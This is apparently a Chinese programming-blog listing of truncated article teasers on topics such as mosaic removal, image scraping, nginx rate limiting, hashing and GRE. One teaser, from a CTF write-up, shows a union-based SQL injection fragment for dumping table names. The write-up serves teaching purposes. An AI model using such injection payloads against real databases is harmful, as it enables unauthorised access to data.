    来源丨程序员软件库 怎么去除图片或者视频上的马赛克 自从马赛克这玩意被弄出来后 让大家悲喜交加 你想在社交软件上发一些图片或者视频 有部分比较隐私的东西 那就需要使用马赛克技术遮挡下 保护下自己隐私或者别人隐私是非常好的 比如 新闻在拍摄报
  • python爬取美女图片

    需求 最近对python爬虫感兴趣 于是也依葫芦画瓢试着用爬虫爬取之前喜欢的网站上的美女图片 网站 http www mm131 com xinggan 其中每一套图都是一张一个页面 存一套图如果是手动得点翻几十个页面 但现在用爬虫的话 就
  • 用python算24点及原理详解

    1 描述 给出4个正整数 使用加 减 乘 除4种运算以及括号把4个数连接起来得到一个结果等于24的表达式 注 这里加 减 乘 除以及括号的运算结果和运算优先级跟平常定义一致 例如 对于5 5 5 1 可知 5 5 1 5 24 又如 对于
  • 连接Nacos的服务程序快速无限打日志longPolling、ClientWorker

    问题 一个微服务环境里很多服务启动以后疯狂打日志 日志是从nacos更新配置 日志 星号脱敏ip 端口 com alibaba nacos client Worker longPolling fixed 10 public ClientWo
  • [极客大挑战 2019]LoveSQL

    考点 常规的sql注入 1 万能密码测试 2 解不了码 没用 3 但是可以注入 测试回显几个字段名 慢慢试 4 爆数据库名和用户名 5 爆库名 6 爆表名 1 union select 1 2 group concat table name
  • 树莓派4b之初学者入门人脸识别(手把手完整版)

    目录 前言 硬件配置 一 烧录镜像和环境配置 二 代码详解 1 基础知识 2 相关代码及其详细注释 三 代码部署和运行 前言 树莓派的性能日益强大 树莓派4b相比上一代的能有了很大的提升 采用了博通最新的BCM4908 64bit处理器 内
  • nginx限流配置

    限流 Rate Limitting 是服务降级的一种方式 通过限制系统的输入和输出流量以达到保护系统的目的 比如我们的网站暴露在公网环境中 除了用户的正常访问 网络爬虫 恶意攻击或者大促等突发流量都可能都会对系统造成压力 如果这种压力超出了
  • 哈希算法总结!!!

    哈希算法 Hash 又称摘要算法 Digest 作用 对任意一组输入数据进行计算 得到一个固定长度的输出摘要 最重要的特点 相同的输入一定得到相同的输出 不同的输入大概率得到不同的输出 哈希算法的目的 为了验证原始数据是否被篡改 哈希算法的
  • GRE详解

    GRE详解 GRE定义 通用路由封装协议GRE Generic Routing Encapsulation 可以对某些网络层协议 如IPX ATM IPv6 AppleTalk等 的数据报文进行封装 使这些被封装的数据报文能够在另一个网络层
  • 如何用Python爬取小游戏网站,把喜欢的游戏收藏起来(附源码)

    简介 Python 是一门简单易学且功能强大的编程语言 无需繁琐的配置 掌握基本语法 了解基本库函数 就可以通过调用海量的现有工具包编写自己的程序 轻松实现批量自动化操作 可以极大提高办公和学习效率 Python爬虫可以批量获取网页上的数据
  • zf0 hack

    444444444 4 4 Internet Superheroes 4 4 4 44 4 With great power